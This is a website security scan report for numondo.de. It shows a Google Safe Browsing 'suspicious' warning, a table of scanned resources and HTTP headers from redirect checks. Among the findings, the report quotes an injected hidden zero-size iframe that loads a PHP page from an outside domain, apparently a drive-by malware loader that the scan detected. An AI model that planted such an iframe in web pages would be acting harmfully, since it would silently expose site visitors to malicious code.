Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=numondo.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://numondo.de/ | 200 OK Content-Length: 29938 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 148 websites. size: 0x0 src: http://mbcobretti.com/hydra.php <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://www.sponsorcounter.de/index.php?act=count&f=5&u=557&p=3906&js=1 | 200 OK Content-Length: 499 Content-Type: text/html | clean |
http://ads.lzjl.com/newServing/showAd.php?nid=5&pid=27053&adtype=&sid=46712 | 200 OK Content-Length: 1492 Content-Type: application/x-javascript | clean |
http://sc.croxy.de/sclocatt.js | 200 OK Content-Length: 2447 Content-Type: application/javascript | clean |
http://www.sponsorcounter.de/test404page.js | 404 Not Found Content-Length: 1027 Content-Type: text/html | clean |
http://FlatAD.de/counter.php?sid=17 | 500 Internal Server Error Content-Length: 0 Content-Type: text/html | clean |
http://www.bonuscounter.de/counter3.php?user=231&site=1598&bg=0&txt=FF00FF | 200 OK Content-Length: 3268 Content-Type: text/html | clean |
http://www.bonuscounter.de/index.php?ref=231 | 200 OK Content-Length: 14536 Content-Type: text/html | clean |
http://bonuscounter.de/counter2.php?user=1&site=1&bg=ffffff&txt=000000 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 01 Mar 2015 04:51:20 GMT Location: http://www.bonuscounter.de/counter2.php?user=1&site=1&bg=ffffff&txt=000000 Server: Apache Vary: Accept-Encoding Content-Length: 294 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bonuscounter.de/counter2.php?user=1&site=1&bg=ffffff&txt=000000 | 200 OK Content-Length: 2281 Content-Type: text/html | clean |
http://www.bonuscounter.de/index.php?ref=1 | 200 OK Content-Length: 14541 Content-Type: text/html | clean |
http://www.tipp-box.de/zufall/bann_125.php?id=507&aid=8 | 200 OK Content-Length: 189 Content-Type: text/html | clean |
http://www.tipp-box.de/index.php?ref=507 | HTTP/1.1 302 Found Connection: close Date: Sun, 01 Mar 2015 04:51:21 GMT Location: http://www.gigapromo.de Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gigapromo.de/ | 200 OK Content-Length: 15491 Content-Type: text/html | clean |
http://www.gigapromo.de/./index.php | 200 OK Content-Length: 15479 Content-Type: text/html | clean |
http://www.gigapromo.de/././index.php | 200 OK Content-Length: 15441 Content-Type: text/html | clean |
http://www.gigapromo.de/./././index.php | 200 OK Content-Length: 15521 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: numondo.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 Mar 2015 04:51:17 GMT
Accept-Ranges: bytes
ETag: "39b57d-74f2-5091dd0339aea"
Server: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8g PHP/5.2.6-1+lenny13 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 29938
Content-Type: text/html
Last-Modified: Mon, 01 Dec 2014 01:48:55 GMT
...29938 bytes of data.
GET / HTTP/1.1
Host: numondo.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 Mar 2015 04:51:17 GMT
Accept-Ranges: bytes
ETag: "39b57d-74f2-5091dd0339aea"
Server: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8g PHP/5.2.6-1+lenny13 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 29938
Content-Type: text/html
Last-Modified: Mon, 01 Dec 2014 01:48:55 GMT
...29938 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: numondo.de
Referer: http://www.google.com/search?q=numondo.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: numondo.de
Referer: http://www.google.com/search?q=numondo.de
Result:
The result is similar to the first query. There are no suspicious redirects found.